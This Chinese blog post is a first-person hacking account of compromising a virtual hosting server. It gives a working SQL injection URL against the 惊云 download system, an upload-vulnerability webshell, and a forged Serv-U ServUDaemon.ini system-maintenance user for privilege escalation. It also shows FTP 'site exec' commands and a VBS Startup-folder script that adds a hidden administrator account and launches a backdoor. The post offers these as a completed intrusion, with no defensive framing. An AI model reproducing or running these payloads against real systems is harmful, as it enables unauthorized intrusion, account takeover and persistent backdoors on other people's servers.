欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

黑客对一台虚拟主机服务器的渗透

程序员文章站 2022-03-19 13:57:02
前几天听一树说了惊云下载系统的漏洞 问题文件出在admin/user.asp 提交 http://www.xxx.com/down/admin/user.asp?user=admin’ and asc(mid(pwd,1,1))>37 and &r... 08-10-08...
前几天听一树说了惊云下载系统的漏洞
问题文件出在admin/user.asp
提交
http://www.xxx.com/down/admin/user.asp?user=admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1
就相当于:
select * from userinfo where user=’admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1’" 利用access注入得到管理员密码
上面有一个文件upfile.htm
手工利用了下动网的upfile.asp漏洞
就成功上传了个asp木马
然后那个虚拟主机的c,d盘是ntfs分区
不能访问e盘装着servu,php,webmail,
f盘是虚拟站点
servu安装目录可写~
本来打算替换他servu文件的~但是觉的太麻烦
还容易让管理员怀疑
想起servu的本地提升来了 在自己计算机上装了个servu
添加了一个用户,设置为系统管理员,目录c:\,具有可执行权限
然后去servu安装目录里看servudaemon.ini
格式是这样的
[global]
version=5.0.0.11
localsetuppassword=072c63105200180d5c07170a7e3e
localsetupportno=60628
processid=972
[domains]
domain1=192.168.0.102||21|向导产生域|1|0|0
domain2=192.168.0.102||2121|123|2|0|0
[domain1]
user1=www|1|0
[user=www|1]
password=ih0c292e1ac82920b7f384007f302a1296
homedir=d:\xiaoben
timeout=600
note1="wizard generated account"
access1=d:\xiaoben|rlpwamcd
skeyvalues=
[domain2]
user1=rover|1|0
user2=123|1|0
[user=rover|2]
password=dx5d12c060f16c7166779414fa038e881d
homedir=c:\
timeout=600
maintenance=system
access1=c:\|rwamelcdp
skeyvalues=
[user=123|2]
password=kv3f6eed70340ad1478adf95963a07fd00
homedir=c:\
timeout=600
access1=c:\|rwamlcdp
skeyvalues=
----------------
其中rover用户就是我添加的那个
在虚拟主机的网页木马上打开虚拟机的servudaemon.ini
访照我本地的ini写进一个用户进去
user1=rover|1|0
[user=rover|2]
password=dx5d12c060f16c7166779414fa038e881d
homedir=c:\
timeout=600
maintenance=system
access1=c:\|rwamelcdp
skeyvalues=
保存~ 用我新建的用户和密码连接~
好的,还是连上了
ftp
ftp>open ip
connected to ip.
220 serv-u ftp server v5.0.0.4 for winsock ready...
user (ip:(none)): id //输入构造的用户
331 user name okay, please send complete e-mail address as password.
password:password //密码
230 user logged in, proceed.
ftp> cd winnt //进入win2k的winnt目录,如果是winxp或者是windows server 2003就应该为windows目录。
250 directory changed to /winnt
ftp>cd system32 //进入system32目录
250 directory changed to /winnt/system32
ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe文件加用户。
提示没有权限~郁闷~
但是我们有对c盘的访问权限了是不~hoho~
把后门(server.exe)传他system32目录
然后写一个vbs教本
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("cmd.exe /c net user tsinternetuser rover1234 /add",0)
b=wshshell.run ("cmd.exe /c net localgroup administrators tsinternetuser /add",0)
b=wshshell.run ("cmd.exe /c net user tsinternetuser /active:yes",0)
b=wshshell.run ("cmd.exe /c server.exe",0) 存为help.vbe
这个教本的作用是修改tsinternetuser用户密码为rover1234
并且提升为管理员
然后执行system32目录下的server.exe
把这个教本传他c:\documents and settings\all users\「开始」菜单\程序\启动
目录
这样管理员只要一登陆就会执行那个教本~
接下来就是等了~
等他登陆~
等了一段时间(看了一部蜘蛛侠的时间吧)~
连接后门~得到admin权限的shell
hoho~
接下来是善后工作了~就不说了
今天心情非常糟~有一些事情压的我喘不过气来
考试的时候当老师面把卷子撕了,然后扬步走了~
妈妈的~过程写的很乱~见谅